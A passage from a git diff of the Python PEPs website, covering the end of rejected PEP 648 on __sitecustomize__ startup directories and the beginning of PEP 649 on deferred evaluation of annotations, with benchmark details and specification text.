PEP 648 was rejected by the steering council +as it has a limited number of use cases and further complicates the startup sequence.

+
+
+

Motivation

+

System administrators, tools that repackage the interpreter and some +libraries need to customize aspects of the interpreter at startup time.

+

This is usually achieved via sitecustomize.py for system administrators +whilst libraries rely on exploiting pth files. This PEP proposes a way of +achieving the same functionality in a more user-friendly and structured way.

+
+

Limitations of pth files

+

If a library needs to perform any customization before an import or that +relates to the general working of the interpreter, they often rely on the +fact that pth files, which are loaded at startup and implemented via the +site module [7], can include Python code that will be executed when the +pth file is evaluated.

+

Note that pth files were originally developed to just add additional +directories to sys.path, but they may also contain lines which start +with “import”, which will be passed to exec(). Users have exploited this +feature to allow the customizations that they needed. See setuptools +[4] or betterexceptions [5] as examples.

+

Using pth files for this purpose is far from ideal for library developers, +as they need to inject code into a single line preceded by an import, making +it rather unreadable. Library developers following that practice will usually +create a module that performs all actions on import, as done by +betterexceptions [5], but the approach is still not really +user friendly.

+

Additionally, it is also non-ideal for users of the interpreter if they want +to inspect what is being executed at Python startup as they need to review +all the pth files for potential code execution which can be spread across +all site paths. Most of those pth files will be “legitimate” pth +files that just modify the path, answering the question of “what is changing +my interpreter at startup” a rather complex one.

+

Lastly, there have been multiple suggestions for removing code execution from +pth files, see [1] and [2].

+
+
+

Limitations of sitecustomize.py

+

Whilst sitecustomize is an acceptable solution, it assumes a single person is +in charge of the system and the interpreter. If both the system administrator +and the responsibility of provisioning the interpreter want to add +customizations at the interpreter startup they need to agree on the contents +of the file and combine all the changes. This is not a major limitation +though, and it is not the main driver of this change. Should the change +happen, it will also improve the situation for these users, as rather than +having a sitecustomize.py which performs all those actions, they can have +custom isolated files named after the features they want to enhance. As an +example, Ubuntu could change their current sitecustomize.py to just be +ubuntu_apport_python_hook. This not only better represents its intent but +also gives users of the interpreter a better understanding of the +modifications happening on their interpreter.

+
+
+
+

Rationale

+

This PEP proposes supporting extensible customization of the interpreter at +startup by executing all files discovered in directories named +__sitecustomize__ in sitepackages [8] or +usersitepackages [9] at startup time.

+
+

Why __sitecustomize__

+

The name aims to follow the already existing concept of sitecustomize.py. +As the directory will be within sys.path, given that it is located in +site paths, we choose to use double underscore around its name, to prevent +colliding with the already existing sitecustomize.py.

+
+
+

Discovering the new __sitecustomize__ directories

+

The Python interpreter will look at startup for directory named +__sitecustomize__ within any of the standard site-packages path.

+

These are commonly the Python system location and the user location, but are +ultimately defined by the site module logic.

+

Users can use site.sitepackages [8] and +site.usersitepackages [9] to know the paths where +the interpreter can discover __sitecustomize__ directories.

+
+
+

Time of __sitecustomize__ discovery

+

The __sitecustomize__ directories will be discovered exactly after pth +files are discovered in a site-packages path as part of site.addsitedir +[10].

+

These is repeated for each of the site-packages path in the exact same order +that is being followed today for pth files.

+
+
+

Order of execution within __sitecustomize__

+

The implementation will execute the files within __sitecustomize__ by +sorting them by name when discovering each of the __sitecustomize__ +directories. We discourage users to rely on the order of execution though.

+

We considered executing them in random order, but that could result in +different results depending on how the interpreter chooses to pick up those +files. So even if it won’t be a good practice to rely on other files being +executed, we think that is better than having randomly different results on +interpreter startup. We chose to run the files after the pth files in +case a user needs to add items to the path before running a files.

+
+
+

Interaction with pth files

+

pth files can be used to add paths into sys.path, but this should not +affect the __sitecustomize__ discovery process, as those directories are +looked up exclusively in site-packages paths.

+
+
+

Execution of files within __sitecustomize__

+

When a __sitecustomize__ directory is discovered, all of the files that +have a .py extension within it will be read with io.open_code and +executed by using exec [11].

+

An empty dictionary will be passed as globals to the exec function +to prevent unexpected interactions between different files.

+
+
+

Failure handling

+

Any error on the execution of any of the files will not be logged unless the +interpreter is run in verbose mode and it should not stop the evaluation of +other files. The user will receive a message in stderr saying that the file +failed to be executed and that verbose mode can be used to get more +information. This behaviour mimics the one existing for sitecustomize.py.

+
+
+

Interaction with virtual environments

+

The customizations applied to an interpreter via the new +__sitecustomize__ solutions will continue to work when a user creates a +virtual environment the same way that sitecustomize.py +interact with virtual environments.

+

This is a difference when compared to pth files, which are not propagated +into virtual environments unless include-system-site-packages is enabled.

+

If library maintainers have features installed via __sitecustomize__ that +they do not want to propagate into virtual environments, they should detect +if they are running within a virtual environment by checking sys.prefix == +sys.base_prefix. This behavior is similar to packages that modify the global +sitecustomize.py.

+
+
+

Interaction with sitecustomize.py and usercustomize.py

+

Until removed, sitecustomize and usercustomize will be executed after +__sitecustomize__ similar to pth files. See the Backward compatibility +section for information on removal plans for sitecustomize and +usercustomize.

+
+
+

Identifying all installed files

+

To facilitate debugging of the Python startup, if the site module is invoked +it will print the __sitecustomize__ directories that will be discovered +on startup.

+
+
+

Files naming convention

+

Packages will be encouraged to include the name of the package within the +name of the file to avoid collisions between packages. But the only +requirement on the filename is that it ends in .py for the interpreter to +execute them.

+
+
+

Disabling start files

+

In some scenarios, like when the startup time is key, it might be desired to +disable this option altogether. The already existing flag -S [3] +will disable all site-related manipulation, including this new feature. +If the flag is passed in, __sitecustomize__ directories will not be +discovered.

+

Additionally, to allow for starting the interpreter disabling only this new +feature a new option will be added under -X: disablesitecustomize, +which will disable the discovery of __sitecustomize__ exclusively.

+

Lastly, the user can disable the discovery of __sitecustomize__ +directories only in the user site by disabling the user site via any of the +multiple options in the site.py module.

+
+
+

Support in build backends

+

Whilst build backends can choose to provide an option to facilitate the +installation of these files into a __sitecustomize__ directory, this +PEP does not address that directly. Similar to pth files, build backends +can choose to not provide an easy-to-configure mechanism for +__sitecustomize__ files and let users hook into the installation +process to include such files. We do not think build backends enhanced +support as a requirement for this PEP.

+
+
+

Impact on startup time

+

A concern in this implementation is how Python interpreter startup time can +be affected by this addition. We expect the performance impact to be highly +coupled to the logic in the files that a user or sysadmin installs in the +Python environment being tested.

+

If the interpreter has any files in their __sitecustomize__ directory, +the file execution time plus a call reading the code will be added to the +startup time. This is similar to how code execution is impacting startup time +through sitecustomize.py, usercustomize.py and code in pth files. +We will therefore focus here on comparing this solution against those three, +as otherwise the actual time added to startup is highly dependent on the code +that is being executed in those files.

+

Results were gathered by running “./python.exe -c pass” with perf on 50 +iterations, repeating 50 times the command on each iteration and getting the +geometric mean of all the results. The file used to run those benchmarks is +checked in in the reference implementation [6].

+

The benchmark was run with 3.10 alpha 7 compiled with PGO and LTO with the +following parameters and system state:

+
    +
  • Perf event: Max sample rate set to 1 per second
  • +
  • CPU Frequency: Minimum frequency of CPU 17,35 set to the maximum frequency
  • +
  • Turbo Boost (MSR): Turbo Boost disabled on CPU 17: MSR 0x1a0 set to 0x4000850089
  • +
  • IRQ affinity: Set default affinity to CPU 0-16,18-34
  • +
  • IRQ affinity: Set affinity of IRQ 1,3-16,21,25-31,56-59,68-85,87,89-90,92-93,95-104 to CPU 0-16,18-34
  • +
  • CPU: use 2 logical CPUs: 17,35
  • +
  • Perf event: Maximum sample rate: 1 per second
  • +
  • ASLR: Full randomization
  • +
  • Linux scheduler: Isolated CPUs (2/36): 17,35
  • +
  • Linux scheduler: RCU disabled on CPUs (2/36): 17,35
  • +
  • CPU Frequency: 0-16,18-34=min=1200 MHz, max=3600 MHz; 17,35=min=max=3600 MHz
  • +
  • Turbo Boost (MSR): CPU 17,35: disabled
  • +
+

The code placed to be executed in pth files, sitecustomize.py, +usercustomize.py and files within __sitecustomize__ is the following:

+
+
import time; x = time.time() ** 5
+

The file is aimed at execution a simple operation but still expected to be +negligible. This is to put the experiment in a situation where we make +visible any hit on performance due to the mechanism whilst still making it +relatively realistic. Additionally, it starts with an import and is a single +line to be able to be used in pth files.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Test# of filesTime (us)
#sitecustomize.pyusercustomize.pypth__sitecustomize__Run 1Run 2
1000Dir not created1388413897
200001387113818
300101396413924
400011394013939
511001399013993
60002 (system + user)1406314040
7005001601116014
8000501545615448
+

Results can be reproduced with run-benchmark.py script provided in the +reference implementation [6].

+

We interpret the following from these results:

+
    +
  • Using two __sitecustomize__ scripts compared to sitecustomize.py +and usercustomize.py slows down the interpreter by 0.3%. We expect this +slowdown until sitecustomize.py and usercustomize.py are removed in +a future release as even if the user does not create the files, the +interpreter will still attempt to import them.
  • +
  • With the arbitrary 50 pth files with code tested, moving those to +__sitecustomize__ produces a speedup of ~3.5% in startup. Which is likely +related to the simpler logic to evaluate __sitecustomize__ files compared +to pth file execution.
  • +
  • In general all measurements show that there is a low impact on startup time +with this addition.
  • +
+
+
+

Audit Event

+

A new audit event will be added and triggered on __sitecustomize__ +execution to facilitate security inspection by calling sys.audit +[12] with “sitecustimze.exec_file” as name and the filename as +argument.

+
+
+

Security implications

+

This PEP aims to move all code execution from pth files to files within a +__sitecustomize__ directory. We think this is an improvement to system admins +for the following reasons:

+
    +
  • Allows to quickly identify the code being executed at startup time by the +interpreter by looking into a single directory rather than having to scan +all pth files.
  • +
  • Allows to track usage of this feature through the new proposed audit event.
  • +
  • Gives finer grain control by allowing to tune permissions on the +__sitecustomize__ directory, potentially allowing users to install only +packages that does not change the interpreter startup.
  • +
+

In short, whilst this allows for a malicious users to drop a file that will +be executed at startup, it’s an improvement compared to the existing pth +files.

+
+
+
+

How to teach this

+

This can be documented and taught as simple as saying that the interpreter +will try to look for the __sitecustomize__ directory at startup in its +site paths and if it finds any files with .py extension, it will then +execute it one by one.

+

For system administrators and tools that package the interpreter, we can now +recommend placing files in __sitecustomize__ as they used to place +sitecustomize.py. Being more comfortable on that their content won’t be +overridden by the next person, as they can provide with specific files to +handle the logic they want to customize.

+

Library developers should be able to specify a new argument on tools like +setuptools that will inject those new files. Something like +sitecustomize_files=["scripts/betterexceptions.py"], which allows them to +add those. Should the build backend not support that, they can manually +install them as they used to do with pth files. We will recommend them to +include the name of the package as part of the file’s name.

+
+
+

Backward compatibility

+

This PEP adds a deprecation warning on sitecustomize.py, +usercustomize.py and pth code execution in 3.11, 3.12 and 3.13. With +plans on removing those features by 3.14. The migration from those solutions +to __sitecustomize__ should ideally be just moving the logic into a +different file.

+

Whilst the existing sitecustomize.py mechanism was created targeting +System Administrators that placed it in a site path, the file could be +actually placed anywhere in the path at the time that the interpreter was +starting up. The new mechanism does not allow for users to place +__sitecustomize__ directories anywhere in the path, but only in site +paths. System administrators can recover a similar behavior to +sitecustomize.py by adding a custom file in __sitecustomize__ which +just imports sitecustomize as a migration path.

+
+
+

Reference Implementation

+

An initial implementation that passes the CPython test suite is available for +evaluation [6].

+

This implementation is just for the reviewer to play with and check potential +issues that this PEP could generate.

+
+
+

Rejected Ideas

+
+

Do nothing

+

Whilst the current status “works” it presents the issues listed in the +motivation. After analyzing the impact of this change, we believe it is worth +it, given the enhanced experience it brings.

+
+
+

Formalize using pth files

+

Another option would be to just glorify and document the usage of pth files +to inject code at startup code, but that is a suboptimal experience for users +as listed in the motivation.

+
+
+

Making __sitecustomize__ a namespace package

+

We considered making the directory a namespace package and just import all +the modules within it, which allowed searching across all paths in +sys.path at initialization time and provided a way to declare +dependencies between files by importing each other. This was rejected for +multiple reasons:

+
    +
  1. This was unnecessarily broadening the list of paths where arbitrary files +are executed.
  2. +
  3. The logic brought additional complexity, like what to do if a package were +to install an __init__.py file in one of the locations.
  4. +
  5. It’s cheaper to search for __sitecustomize__ as we are looking for +pth files already in the site paths compared to performing an actual +import of a namespace package.
  6. +
+
+
+

Support for shutdown customization

+

init.d users might be tempted to implement this feature in a way that users +could also add code at shutdown, but extra support for that is not needed, as +Python users can already do that via atexit.

+
+
+

Using entry_points

+

We considered extending the use of entry points to allow specifying files +that should be executed at startup but we discarded that solution due to two +main reasons. The first one being impact on startup time. This approach will +require scanning all packages distribution information to just execute a +handful of files. This has an impact on performance even if the user is not +using the feature and such impact growths linearly with the number of packages +installed in the environment. The second reason was that the proposed +implementation in this PEP offers a single solution for startup customization +for packages and system administrators. Additionally, if the main objective of +entry points is to make it easy for libraries to install files at startup, +that can still be added and make the build backends just install the files +within the __sitecustomize__ directory.

+
+
+ +
+

Acknowledgements

+

Thanks Pablo Galindo for contributing to this PEP and offering his PC to run +the benchmark.

+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0648.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0649/index.html b/pep-0649/index.html new file mode 100644 index 00000000000..72010482f5d --- /dev/null +++ b/pep-0649/index.html @@ -0,0 +1,1512 @@ + + + + + + + + PEP 649 – Deferred Evaluation Of Annotations Using Descriptors | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 649 – Deferred Evaluation Of Annotations Using Descriptors

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
11-Jan-2021
+
Python-Version:
+
3.14
+
Post-History:
+
11-Jan-2021, +12-Apr-2021, +18-Apr-2021, +09-Aug-2021, +20-Oct-2021, +20-Oct-2021, +17-Nov-2021, +15-Mar-2022, +23-Nov-2022, +07-Feb-2023, +11-Apr-2023
+
Replaces:
+
563
+
Resolution:
+
08-May-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

Annotations are a Python technology that allows expressing +type information and other metadata about Python functions, +classes, and modules. But Python’s original semantics +for annotations required them to be eagerly evaluated, +at the time the annotated object was bound. This caused +chronic problems for static type analysis users using +“type hints”, due to forward-reference and circular-reference +problems.

+

Python solved this by accepting PEP 563, incorporating +a new approach called “stringized annotations” in which +annotations were automatically converted into strings by +Python. This solved the forward-reference and circular-reference +problems, and also fostered intriguing new uses for annotation +metadata. But stringized annotations in turn caused chronic +problems for runtime users of annotations.

+

This PEP proposes a new and comprehensive third approach +for representing and computing annotations. It adds a new +internal mechanism for lazily computing annotations on demand, +via a new object method called __annotate__. +This approach, when combined with a novel technique for +coercing annotation values into alternative formats, solves +all the above problems, supports all existing use cases, +and should foster future innovations in annotations.

+
+
+

Overview

+

This PEP adds a new dunder attribute to the objects that +support annotations–functions, classes, and modules. +The new attribute is called __annotate__, and is +a reference to a function which computes and returns +that object’s annotations dict.

+

At compile time, if the definition of an object includes +annotations, the Python compiler will write the expressions +computing the annotations into its own function. When run, +the function will return the annotations dict. The Python +compiler then stores a reference to this function in +__annotate__ on the object.

+

Furthermore, __annotations__ is redefined to be a +“data descriptor” which calls this annotation function once +and caches the result.

+

This mechanism delays the evaluation of annotations expressions +until the annotations are examined, which solves many circular +reference problems.

+

This PEP also defines new functionality for two functions +in the Python standard library: +inspect.get_annotations and typing.get_type_hints. +The functionality is accessed via a new keyword-only parameter, +format. format allows the user to request +the annotations from these functions +in a specific format. +Format identifiers are always predefined integer values. +The formats defined by this PEP are:

+
    +
  • inspect.VALUE = 1

    The default value. +The function will return the conventional Python +values for the annotations. This format is identical +to the return value for these functions under Python 3.11.

    +
  • +
  • inspect.FORWARDREF = 2

    The function will attempt to return the conventional +Python values for the annotations. However, if it +encounters an undefined name, or a free variable that +has not yet been associated with a value, it dynamically +creates a proxy object (a ForwardRef) that substitutes +for that value in the expression, then continues evaluation. +The resulting dict may contain a mixture of proxies and +real values. If all real values are defined at the time +the function is called, inspect.FORWARDREF and +inspect.VALUE produce identical results.

    +
  • +
  • inspect.SOURCE = 3

    The function will produce an annotation dictionary +where the values have been replaced by strings containing +the original source code for the annotation expressions. +These strings may only be approximate, as they may be +reverse-engineered from another format, rather than +preserving the original source code, but the differences +will be minor.

    +
  • +
+

If accepted, this PEP would supersede PEP 563, +and PEP 563’s behavior would be deprecated and +eventually removed.

+
+

Comparison Of Annotation Semantics

+
+

Note

+

The code presented in this section is simplified +for clarity, and is intentionally inaccurate in some +critical aspects. This example is intended merely to +communicate the high-level concepts involved without +getting lost in the details. But readers should note +that the actual implementation is quite different in +several important ways. See the Implementation +section later in this PEP for a far more accurate +description of what this PEP proposes from a technical +level.

+
+

Consider this example code:

+
def foo(x: int = 3, y: MyType = None) -> float:
+    ...
+class MyType:
+    ...
+foo_y_annotation = foo.__annotations__['y']
+
+
+

As we see here, annotations are available at runtime through an +__annotations__ attribute on functions, classes, and modules. +When annotations are specified on one of these objects, +__annotations__ is a dictionary mapping the names of the +fields to the value specified as that field’s annotation.

+

The default behavior in Python is to evaluate the expressions +for the annotations, and build the annotations dict, at the time +the function, class, or module is bound. At runtime the above +code actually works something like this:

+
annotations = {'x': int, 'y': MyType, 'return': float}
+def foo(x = 3, y = "abc"):
+    ...
+foo.__annotations__ = annotations
+class MyType:
+    ...
+foo_y_annotation = foo.__annotations__['y']
+
+
+

The crucial detail here is that the values int, MyType, +and float are looked up at the time the function object is +bound, and these values are stored in the annotations dict. +But this code doesn’t run—it throws a NameError on the first +line, because MyType hasn’t been defined yet.

+

PEP 563’s solution is to decompile the expressions back +into strings during compilation and store those strings as the +values in the annotations dict. The equivalent runtime code +would look something like this:

+
annotations = {'x': 'int', 'y': 'MyType', 'return': 'float'}
+def foo(x = 3, y = "abc"):
+    ...
+foo.__annotations__ = annotations
+class MyType:
+    ...
+foo_y_annotation = foo.__annotations__['y']
+
+
+

This code now runs successfully. However, foo_y_annotation +is no longer a reference to MyType, it is the string +'MyType'. To turn the string into the real value MyType, +the user would need to evaluate the string using eval, +inspect.get_annotations, or typing.get_type_hints.

+

This PEP proposes a third approach, delaying the evaluation of +the annotations by computing them in their own function. If +this PEP was active, the generated code would work something +like this:

+
class function:
+    # __annotations__ on a function object is already a
+    # "data descriptor" in Python, we're just changing
+    # what it does
+    @property
+    def __annotations__(self):
+        return self.__annotate__()
+
+# ...
+
+def annotate_foo():
+    return {'x': int, 'y': MyType, 'return': float}
+def foo(x = 3, y = "abc"):
+    ...
+foo.__annotate__ = annotate_foo
+class MyType:
+   ...
+foo_y_annotation = foo.__annotations__['y']
+
+
+

The important change is that the code constructing the +annotations dict now lives in a function—here, called +annotate_foo(). But this function isn’t called +until we ask for the value of foo.__annotations__, +and we don’t do that until after the definition of MyType. +So this code also runs successfully, and foo_y_annotation now +has the correct value–the class MyType–even though +MyType wasn’t defined until after the annotation was +defined.

+
+
+

Mistaken Rejection Of This Approach In November 2017

+

During the early days of discussion around PEP 563, +in a November 2017 thread in comp.lang.python-dev, +the idea of using code to delay the evaluation of +annotations was briefly discussed. At the time the +technique was termed an “implicit lambda expression”.

+

Guido van Rossum—Python’s BDFL at the time—replied, +asserting that these “implicit lambda expression” wouldn’t +work, because they’d only be able to resolve symbols at +module-level scope:

+
+
IMO the inability of referencing class-level definitions +from annotations on methods pretty much kills this idea.
+

https://mail.python.org/pipermail/python-dev/2017-November/150109.html

+

This led to a short discussion about extending lambda-ized +annotations for methods to be able to refer to class-level +definitions, by maintaining a reference to the class-level +scope. This idea, too, was quickly rejected.

+

PEP 563 summarizes the above discussion

+

The approach taken by this PEP doesn’t suffer from these +restrictions. Annotations can access module-level definitions, +class-level definitions, and even local and free variables.

+
+
+
+

Motivation

+
+

A History Of Annotations

+

Python 3.0 shipped with a new syntax feature, “annotations”, +defined in PEP 3107. +This allowed specifying a Python value that would be +associated with a parameter of a Python function, or +with the value that function returns. +Said another way, annotations gave Python users an interface +to provide rich metadata about a function parameter or return +value, for example type information. +All the annotations for a function were stored together in +a new attribute __annotations__, in an “annotation dict” +that mapped parameter names (or, in the case of the return +annotation, using the name 'return') to their Python value.

+

In an effort to foster experimentation, Python +intentionally didn’t define what form this metadata should take, +or what values should be used. User code began experimenting with +this new facility almost immediately. But popular libraries that +make use of this functionality were slow to emerge.

+

After years of little progress, the BDFL chose a particular +approach for expressing static type information, called +type hints, as defined in PEP 484. Python 3.5 shipped +with a new typing module which quickly became very popular.

+

Python 3.6 added syntax to annotate local variables, +class attributes, and module attributes, using the approach +proposed in PEP 526. Static type analysis continued to +grow in popularity.

+

However, static type analysis users were increasingly frustrated +by an inconvenient problem: forward references. In classic +Python, if a class C depends on a later-defined class D, +it’s normally not a problem, because user code will usually +wait until both are defined before trying to use either. +But annotations added a new complication, because they were +computed at the time the annotated object (function, class, +or module) was bound. If methods on class C are annotated with +type D, and these annotation expressions are computed at the +time that the method is bound, D may not be defined yet. +And if methods in D are also annotated with type C, you now +have an unresolvable circular reference problem.

+

Initially, static type users worked around this problem +by defining their problematic annotations as strings. +This worked because a string containing the type hint was +just as usable for the static type analysis tool. +And users of static type analysis tools rarely examine the +annotations at runtime, so this representation wasn’t +itself an inconvenience. But manually stringizing type +hints was clumsy and error-prone. Also, code bases were +adding more and more annotations, which consumed more and +more CPU time to create and bind.

+

To solve these problems, the BDFL accepted PEP 563, which +added a new feature to Python 3.7: “stringized annotations”. +It was activated with a future import:

+
from __future__ import annotations
+
+
+

Normally, annotation expressions were evaluated at the time +the object was bound, with their values being stored in the +annotations dict. When stringized annotations were active, +these semantics changed: instead, at compile time, the compiler +converted all annotations in that module into string +representations of their source code–thus, automatically +turning the users’s annotations into strings, obviating the +need to manually stringize them as before. PEP 563 +suggested users could evaluate this string with eval +if the actual value was needed at runtime.

+

(From here on out, this PEP will refer to the classic +semantics of PEP 3107 and PEP 526, where the +values of annotation expressions are computed at the time +the object is bound, as “stock” semantics, to differentiate +them from the new PEP 563 “stringized” annotation semantics.)

+
+
+

The Current State Of Annotation Use Cases

+

Although there are many specific use cases for annotations, +annotation users in the discussion around this PEP tended +to fall into one of these four categories.

+
+

Static typing users

+

Static typing users use annotations to add type information +to their code. But they largely don’t examine the annotations +at runtime. Instead, they use static type analysis tools +(mypy, pytype) to examine their source tree and determine +whether or not their code is using types consistently. +This is almost certainly the most popular use case for +annotations today.

+

Many of the annotations use type hints, a la PEP 484 +(and many subsequent PEPs). Type hints are passive objects, +mere representation of type information; they don’t do any actual work. +Type hints are often parameterized with other types or other type hints. +Since they’re agnostic about what these actual values are, type hints +work fine with ForwardRef proxy objects. +Users of static type hints discovered that extensive type hinting under +stock semantics often created large-scale circular reference and circular +import problems that could be difficult to solve. PEP 563 was designed +specifically to solve this problem, and the solution worked great for +these users. The difficulty of rendering stringized annotations into +real values largely didn’t inconvenience these users because of how +infrequently they examine annotations at runtime.

+

Static typing users often combine PEP 563 with the +if typing.TYPE_CHECKING idiom to prevent their type hints from being +loaded at runtime. This means they often aren’t able to evaluate their +stringized annotations and produce real values at runtime. On the rare +occasion that they do examine annotations at runtime, they often forgo +eval, instead using lexical analysis directly on the stringized +annotations.

+

Under this PEP, static typing users will probably prefer FORWARDREF +or SOURCE format.

+
+
+

Runtime annotation users

+

Runtime annotation users use annotations as a means of expressing rich +metadata about their functions and classes, which they use as input to +runtime behavior. Specific use cases include runtime type verification +(Pydantic) and glue logic to expose Python APIs in another domain +(FastAPI, Typer). The annotations may or may not be type hints.

+

As runtime annotation users examine annotations at runtime, they were +traditionally better served with stock semantics. This use case is +largely incompatible with PEP 563, particularly with the +if typing.TYPE_CHECKING idiom.

+

Under this PEP, runtime annotation users will most likely prefer VALUE +format, though some (e.g. if they evaluate annotations eagerly in a decorator +and want to support forward references) may also use FORWARDREF format.

+
+
+

Wrappers

+

Wrappers are functions or classes that wrap user functions or +classes and add functionality. Examples of this would be +dataclass(), functools.partial(), +attrs, and wrapt.

+

Wrappers are a distinct subcategory of runtime annotation users. +Although they do use annotations at runtime, they may or may not +actually examine the annotations of the objects they wrap–it depends +on the functionality the wrapper provides. As a rule they should +propagate the annotations of the wrapped object to the wrapper +they create, although it’s possible they may modify those annotations.

+

Wrappers were generally designed to work well under stock semantics. +Whether or not they work well under PEP 563 semantics depends on the +degree to which they examine the wrapped object’s annotations. +Often wrappers don’t care about the value per se, only needing +specific information about the annotations. Even so, PEP 563 +and the if typing.TYPE_CHECKING idiom can make it difficult +for wrappers to reliably determine the information they need at +runtime. This is an ongoing, chronic problem. +Under this PEP, wrappers will probably prefer FORWARDREF format +for their internal logic. But the wrapped objects need to support +all formats for their users.

+
+
+

Documentation

+

PEP 563 stringized annotations were a boon for tools that +mechanically construct documentation.

+

Stringized type hints make for excellent documentation; type hints +as expressed in source code are often succinct and readable. However, +at runtime these same type hints can produce value at runtime whose repr +is a sprawling, nested, unreadable mess. Thus documentation users were +well-served by PEP 563 but poorly served with stock semantics.

+

Under this PEP, documentation users are expected to use SOURCE format.

+
+
+
+

Motivation For This PEP

+

Python’s original semantics for annotations made its use for +static type analysis painful due to forward reference problems. +PEP 563 solved the forward reference problem, and many +static type analysis users became happy early adopters of it. +But its unconventional solution created new problems for two +of the above cited use cases: runtime annotation users, +and wrappers.

+

First, stringized annotations didn’t permit referencing local or +free variables, which meant many useful, reasonable approaches +to creating annotations were no longer viable. This was +particularly inconvenient for decorators that wrap existing +functions and classes, as these decorators often use closures.

+

Second, in order for eval to correctly look up globals in a +stringized annotation, you must first obtain a reference +to the correct module. +But class objects don’t retain a reference to their globals. +PEP 563 suggests looking up a class’s module by name in +sys.modules—a surprising requirement for a language-level +feature.

+

Additionally, complex but legitimate constructions can make it +difficult to determine the correct globals and locals dicts to +give to eval to properly evaluate a stringized annotation. +Even worse, in some situations it may simply be infeasible.

+

For example, some libraries (e.g. typing.TypedDict, dataclasses) +wrap a user class, then merge all the annotations from all that +class’s base classes together into one cumulative annotations dict. +If those annotations were stringized, calling eval on them later +may not work properly, because the globals dictionary used for the +eval will be the module where the user class was defined, +which may not be the same module where the annotation was +defined. However, if the annotations were stringized because +of forward-reference problems, calling eval on them early +may not work either, due to the forward reference not being +resolvable yet. This has proved to be difficult to reconcile; +of the three bug reports linked to below, only one has been +marked as fixed.

+ +

Even with proper globals and locals, eval can be unreliable +on stringized annotations. +eval can only succeed if all the symbols referenced in +an annotations are defined. If a stringized annotation refers +to a mixture of defined and undefined symbols, a simple eval +of that string will fail. This is a problem for libraries with +that need to examine the annotation, because they can’t reliably +convert these stringized annotations into real values.

+
    +
  • Some libraries (e.g. dataclasses) solved this by foregoing real +values and performing lexical analysis of the stringized annotation, +which requires a lot of work to get right.
  • +
  • Other libraries still suffer with this problem, +which can produce surprising runtime behavior. +https://github.com/python/cpython/issues/97727
  • +
+

Also, eval() is slow, and it isn’t always available; it’s +sometimes removed for space reasons on certain platforms. +eval() on MicroPython doesn’t support the locals +argument, which makes converting stringized annotations +into real values at runtime even harder.

+

Finally, PEP 563 requires Python implementations to +stringize their annotations. This is surprising behavior—unprecedented +for a language-level feature, with a complicated implementation, +that must be updated whenever a new operator is added to the +language.

+

These problems motivated the research into finding a new +approach to solve the problems facing annotations users, +resulting in this PEP.

+
+
+
+

Implementation

+
+

Observed semantics for annotations expressions

+

For any object o that supports annotations, +provided that all names evaluated in the annotations expressions +are bound before o is defined and never subsequently rebound, +o.__annotations__ will produce an identical annotations dict both +when “stock” semantics are active and when this PEP is active. +In particular, name resolution will be performed identically in +both scenarios.

+

When this PEP is active, the value of o.__annotations__ +won’t be calculated until the first time o.__annotations__ +itself is evaluated. All evaluation of the annotation expressions +is delayed until this moment, which also means that

+
    +
  • names referenced in the annotations expressions will use their +current value at this moment, and
  • +
  • if evaluating the annotations expressions raises an exception, +that exception will be raised at this moment.
  • +
+

Once o.__annotations__ is successfully calculated for the +first time, this value is cached and will be returned by future +requests for o.__annotations__.

+
+
+

__annotate__ and __annotations__

+

Python supports annotations on three different types: +functions, classes, and modules. This PEP modifies +the semantics on all three of these types in a similar +way.

+

First, this PEP adds a new “dunder” attribute, __annotate__. +__annotate__ must be a “data descriptor”, +implementing all three actions: get, set, and delete. +The __annotate__ attribute is always defined, +and may only be set to either None or to a callable. +(__annotate__ cannot be deleted.) If an object +has no annotations, __annotate__ should be +initialized to None, rather than to a function +that returns an empty dict.

+

The __annotate__ data descriptor must have dedicated +storage inside the object to store the reference to its value. +The location of this storage at runtime is an implementation +detail. Even if it’s visible to Python code, it should still +be considered an internal implementation detail, and Python +code should prefer to interact with it only via the +__annotate__ attribute.

+

The callable stored in __annotate__ must accept a +single required positional argument called format, +which will always be an int (or a subclass of int). +It must either return a dict (or subclass of dict) or +raise NotImplementedError().

+

Here’s a formal definition of __annotate__, as it will +appear in the “Magic methods” section of the Python +Language Reference:

+
+
__annotate__(format: int) -> dict

Returns a new dictionary object mapping attribute/parameter +names to their annotation values.

+

Takes a format parameter specifying the format in which +annotations values should be provided. Must be one of the +following:

+

inspect.VALUE (equivalent to the int constant 1)

+
+
Values are the result of evaluating the annotation expressions.
+

inspect.FORWARDREF (equivalent to the int constant 2)

+
+
Values are real annotation values (as per inspect.VALUE format) +for defined values, and ForwardRef proxies for undefined values. +Real objects may be exposed to, or contain references to, +ForwardRef proxy objects.
+

inspect.SOURCE (equivalent to the int constant 3)

+
+
Values are the text string of the annotation as it +appears in the source code. May only be approximate; +whitespace may be normalized, and constant values may +be optimized. It’s possible the exact values of these +strings could change in future version of Python.
+

If an __annotate__ function doesn’t support the requested +format, it must raise NotImplementedError(). +__annotate__ functions must always support 1 (inspect.VALUE) +format; they must not raise NotImplementedError() when called with +format=1.

+

When called with format=1, an __annotate__ function +may raise NameError; it must not raise NameError when called +requesting any other format.

+

If an object doesn’t have any annotations, __annotate__ should +preferably be set to None (it can’t be deleted), rather than set to a +function that returns an empty dict.

+
+

When the Python compiler compiles an object with +annotations, it simultaneously compiles the appropriate +annotate function. This function, called with +the single positional argument inspect.VALUE, +computes and returns the annotations dict as defined +on that object. The Python compiler and runtime work +in concert to ensure that the function is bound to +the appropriate namespaces:

+
    +
  • For functions and classes, the globals dictionary will +be the module where the object was defined. If the object +is itself a module, its globals dictionary will be its +own dict.
  • +
  • For methods on classes, and for classes, the locals dictionary +will be the class dictionary.
  • +
  • If the annotations refer to free variables, the closure will +be the appropriate closure tuple containing cells for free variables.
  • +
+

